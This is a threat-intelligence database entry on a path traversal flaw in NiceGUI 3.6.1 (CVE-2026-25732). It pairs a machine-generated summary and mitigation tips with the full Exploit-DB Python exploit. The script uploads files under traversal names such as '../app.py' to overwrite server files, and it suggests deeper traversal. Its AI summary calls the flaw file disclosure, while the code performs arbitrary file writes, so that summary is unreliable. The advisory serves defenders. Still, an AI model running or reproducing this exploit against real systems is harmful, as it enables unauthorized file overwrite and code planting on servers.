NiceGUI 3.6.1 - Path Traversal
NiceGUI 3.6.1 - Path Traversal
AI Analysis
Technical Summary
NiceGUI 3.6.1 is affected by a path traversal vulnerability that could allow an attacker to access arbitrary files on the server by manipulating file path inputs. The vulnerability is documented with an exploit published on Exploit-DB (ID 52534) and includes Python exploit code. There is no information on affected subversions or vendor-provided patches. The service is not cloud-hosted, so remediation depends on the user applying fixes if available.
Potential Impact
Successful exploitation could lead to unauthorized disclosure of sensitive files on the server running NiceGUI 3.6.1. This may expose configuration files, credentials, or other sensitive data accessible via the file system. There is no indication of remote code execution or denial of service from the provided data.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, users should consider restricting access to the NiceGUI service and validating or sanitizing file path inputs to mitigate exploitation risk.
Indicators of Compromise
- exploit-code: # Exploit Title: NiceGUI 3.6.1 - Path Traversal # Author: Mohammed Idrees Banyamer # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # Date: 2025-06-06 # Tested on: NiceGUI <= 3.6.1 (Python 3.8–3.12 on Linux/Windows) # CVE: CVE-2026-25732 # # Affected Versions: <= 3.6.1 (fixed in 3.7.0) # # Type: Remote Arbitrary File Write / Path Traversal # Platform: Web Application (Python / NiceGUI) # Author Country: Jordan # Weakness: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) # Attack Vector: Network # Privileges Required: None #!/usr/bin/env python3 """ CVE-2026-25732 — NiceGUI arbitrary file write (path traversal) Exploits unsanitized FileUpload.name when app uses it in save path. Usage: python exploit_cve_2026_25732.py http://target:8080 "../etc/passwd" payload.txt python exploit_cve_2026_25732.py http://target:8080 "../app.py" malicious_app.py """ import sys import requests from urllib.parse import urljoin from pathlib import Path def exploit(target_url: str, malicious_filename: str, local_payload_path: str | Path): target_url = target_url.rstrip('/') + '/' try: with open(local_payload_path, 'rb') as f: payload_bytes = f.read() except Exception as e: print(f"[-] Cannot read payload file: {e}") sys.exit(1) files = { 'file': (malicious_filename, payload_bytes, 'application/octet-stream') } print(f"[*] Target : {target_url}") print(f"[*] Malicious name : {malicious_filename}") print(f"[*] Payload size : {len(payload_bytes):,} bytes") try: # NiceGUI upload endpoint is usually the page itself (multipart POST to /) r = requests.post( target_url, files=files, timeout=12, allow_redirects=False ) print(f"[+] Response : {r.status_code} {r.reason}") if r.status_code in (200, 201, 204): print("[SUCCESS] Upload accepted — file likely written") elif r.status_code == 413: print("[!] Payload too large (server limit)") elif r.status_code in (400, 403, 422): print("[!] Rejected — target may be patched / not vulnerable / wrong endpoint") else: print("[?] Unexpected response — check manually") print("\nSnippet of response:") print(r.text[:600].replace('\n', ' ').strip() + "..." if len(r.text) > 600 else r.text) except requests.RequestException as e: print(f"[-] Request failed: {e}") print("\nNext steps:") print(" • Check filesystem on target (if you have access)") print(" • If you overwrote app.py / main.py → wait for reload / restart") print(" • Try deeper traversal: '../../some/secret/file' etc.") if __name__ == '__main__': if len(sys.argv) != 4: print(__doc__) sys.exit(1) target = sys.argv[1] dest_filename = sys.argv[2] payload_file = sys.argv[3] exploit(target, dest_filename, payload_file)
NiceGUI 3.6.1 - Path Traversal
Description
NiceGUI 3.6.1 - Path Traversal
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
NiceGUI 3.6.1 is affected by a path traversal vulnerability that could allow an attacker to access arbitrary files on the server by manipulating file path inputs. The vulnerability is documented with an exploit published on Exploit-DB (ID 52534) and includes Python exploit code. There is no information on affected subversions or vendor-provided patches. The service is not cloud-hosted, so remediation depends on the user applying fixes if available.
Potential Impact
Successful exploitation could lead to unauthorized disclosure of sensitive files on the server running NiceGUI 3.6.1. This may expose configuration files, credentials, or other sensitive data accessible via the file system. There is no indication of remote code execution or denial of service from the provided data.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, users should consider restricting access to the NiceGUI service and validating or sanitizing file path inputs to mitigate exploitation risk.
Technical Details
- Edb Id
- 52534
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for NiceGUI 3.6.1 - Path Traversal
# Exploit Title: NiceGUI 3.6.1 - Path Traversal # Author: Mohammed Idrees Banyamer # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # Date: 2025-06-06 # Tested on: NiceGUI <= 3.6.1 (Python 3.8–3.12 on Linux/Windows) # CVE: CVE-2026-25732 # # Affected Versions: <= 3.6.1 (fixed in 3.7.0) # # Type: Remote Arbitrary File Write / Path Traversal # Platform: Web Application (Python / NiceGUI) # Author Country: Jordan # Weakness: CWE-22 (Improper Limitation of a Pathname to a Rest... (2511 more characters)
Threat ID: 69f311cccbff5d8610aa56d2
Added to database: 4/30/2026, 8:24:44 AM
Last enriched: 4/30/2026, 8:24:52 AM
Last updated: 5/1/2026, 7:07:37 AM
Views: 4
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.